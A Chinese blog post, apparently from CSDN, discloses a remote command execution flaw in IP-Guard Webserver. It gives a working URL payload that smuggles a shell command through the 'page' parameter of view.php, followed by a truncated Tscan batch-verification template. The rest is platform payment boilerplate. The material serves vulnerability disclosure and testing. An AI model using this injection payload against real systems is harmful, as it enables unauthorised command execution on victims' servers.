IP-Guard Webserver 远程命令执行漏洞(含批量验证poc)

本文介绍了IP-Guard Webserver的远程命令执行漏洞,详细阐述了漏洞描述、复现过程及POC使用,提供Tscan工具进行批量验证,并给出了修复建议。
摘要由CSDN通过智能技术生成

0x01漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理

0x02漏洞复现

(1)payload利用地址:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+12345+%3Ett.txt

(2)文件上传POC:

0x03POC使用(Tscan验证)

params: []
name: IP-Guard Webserver 远程命令执行漏洞
set:
a4: randomLowercase(8)
a5: randomLowercase(7)
a6: '"SAMEORIGIN"'
rules:

method: GET
path: /ipg/static/ap
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值